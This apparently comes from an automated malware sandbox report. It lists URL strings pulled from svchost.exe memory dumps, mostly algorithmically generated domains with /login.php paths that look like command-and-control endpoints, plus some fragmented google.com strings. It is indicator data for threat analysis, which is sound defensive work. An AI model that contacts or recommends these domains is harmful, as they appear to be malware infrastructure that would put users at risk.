Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykak.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104503124.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095357907.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2532272707.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2502894281.000000000B5A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopymit.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450669310.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071802239.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2445920188.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460490914.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2006802225.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqim.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148887592.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282876167.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346145517.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144468325.000000000B5A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135966274.000000000B4F8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.2372234608.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373704287.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376344539.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyret.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460981585.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2462483307.000000000673C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080123231.000000000B403000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064129589.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2344530574.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1899516782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1892728741.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2352150656.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1890971737.0000000006682000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351895314.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1896515314.000000000B448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzuc.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2130330367.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2615964782.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2602579791.00000000066DF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2128851747.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2133387023.00000000029F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593516239.00000000029A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzyk.com/login.php
Source: svchost.exe, 00000002.00000003.2425680040.0000000002945000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031331008.0000000002944000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031297551.000000000B403000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2040854796.00000000066E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036793512.000000000B449000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413687945.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036454724.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034067878.000000000B43F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycut.com/login.php
Source: svchost.exe, 00000002.00000003.2479266267.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499421863.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2487658831.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495909273.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2495911372.000000000B535000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2500037044.000000000B444000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyguf.com/login.php
Source: svchost.exe, 00000002.00000003.2469329188.000000000B5B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460477363.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2060544506.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071227811.000000000B449000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowykuc.com/login.php
Source: svchost.exe, 00000002.00000003.2395569256.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019860947.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2460748465.00000000029C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420228820.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425878319.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2438787331.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2400273849.000000000B57B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2397913686.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1998698714.0000000006676000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2423753303.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2454863582.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2392605656.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2446339089.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003027083.0000000002948000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2012053019.00000000029CB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2561052961.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowymyk.com/login.php
Source: svchost.exe, 00000002.00000003.2043875404.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2053556907.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052689552.000000000B507000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2052518318.000000000B505000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowypek.com/login.php
Source: svchost.exe, 00000002.00000003.2369271116.000000000B5A8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004274360.000000000B444000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2372963620.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003766922.000000000B43F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380878741.000000000B5AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398181780.000000000B5AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyqoc.com/login.php
Source: svchost.exe, 00000002.00000003.2577183287.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619072820.000000000B509000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577269587.000000000B508000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2619465827.000000000B538000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2577016387.000000000B537000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2586584940.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593876696.00000000029C4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2599201022.00000000046FA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123452647.000000000B5AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575606390.00000000029BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrec.com/login.php
Source: svchost.exe, 00000002.00000003.2085124137.000000000B505000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2066725396.000000000B507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyrif.com/login.php
Source: svchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1995198277.0000000002930000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339528056.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2145862063.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2277427978.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2282094346.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9e
Source: svchost.exe, 00000002.00000003.2119703329.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2023171652.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004394237.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2055181884.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2003033215.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2125785660.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2088268676.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045392452.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2106127398.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2036974301.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2019866036.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071756308.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2083355602.00000000029A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1853-34e6-b36e-a2256d9e0a9ehttp://ww16.vofycot.com/l
Source: svchost.exe, 00000002.00000003.2349662747.000000000B546000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2557663546.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2593592120.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2351475687.000000000464A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2441645467.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369953601.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359613233.000000000B4A2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2524608844.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2404604691.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2576429245.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2450513652.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2464658514.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2420663159.00000000029A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2416226275.00000000029A7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2394184434.00000000029A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ww16.vofycot.com/login.php?sub1=20240908-1854-132f-8c2f-134916a1e9d0
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2144731750.000000000087D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581192677.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1415492981.00000000029CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1375299092.000000000B41C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.php
Source: svchost.exe, 00000002.00000003.2270666534.00000000029C3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2269182455.00000000029BF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148950265.00000000029C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.gahyqah.com/login.phpX
Source: svchost.exe, svchost.exe, 00000002.00000003.2038084738.0000000000880000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1793775330.0000000002927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546989699.000000000B59E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092240495.0000000006715000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092240495.0000000006724000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2092848664.000000000B55C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2004850062.000000000B4DB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135970617.00000000046D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2492191607.000000000B5C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567301862.000000000466E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425282961.0000000000880000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1740729143.00000000037F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2078383290.000000000B4D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2530731383.0000000002927000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1797181717.00000000029E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1894831807.00000000029D3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2102153944.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567301862.000000000467A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: svchost.exe, 00000002.00000003.2559097035.000000000670F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135970617.00000000046D2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2567301862.000000000467A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2063064652.0000000006618000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2096603295.0000000006717000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536103224.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031225695.00000000029D8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111613635.000000000B56B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2013936272.000000000661E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2034217725.0000000006619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365692304.000000000B561000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138738182.00000000046B9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2038084738.0000000000878000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142352600.0000000004619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2261700677.00000000046CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2080112052.000000000088B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2018296118.000000000B4CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B55E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2506530381.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2140281844.000000000B55E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt
Source: svchost.exe, 00000002.00000003.2536103224.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2262404018.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434822380.000000000B54C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2436784051.000000000B54C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2429116618.000000000B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2264867591.000000000B551000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt#U
Source: svchost.exe, 00000002.00000003.1357214810.00000000029F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt-
Source: svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2262404018.000000000B551000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465295118.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084997781.000000000B553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comt4U
Source: svchost.exe, 00000002.00000003.2363361168.000000000B554000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtEU
Source: svchost.exe, 00000002.00000003.2043884959.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2148584433.000000000B5C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2031225695.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536917533.00000000029D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtd
Source: svchost.exe, 00000002.00000003.2490872020.0000000006725000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135962795.0000000006725000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtmr
Source: svchost.exe, 00000002.00000003.2043884959.00000000029D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2369953601.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2095358476.00000000029D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2123555965.00000000029D4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2064178580.00000000029D6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2085113371.00000000029D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtu
Source: svchost.exe, 00000002.00000003.2142075721.000000000B553000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2413677903.000000000B554000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2434822380.000000000B556000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2339536084.000000000B555000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138728432.000000000B552000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2536103224.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2465295118.000000000B557000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2135922643.000000000B554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.google.comtxU
Source: svchost.exe, 00000002.00000003.1650789737.00000000066CE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1796639933.0000000006795000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1889211197.0000000006624000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2605273063.0000000006791000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.w.org/
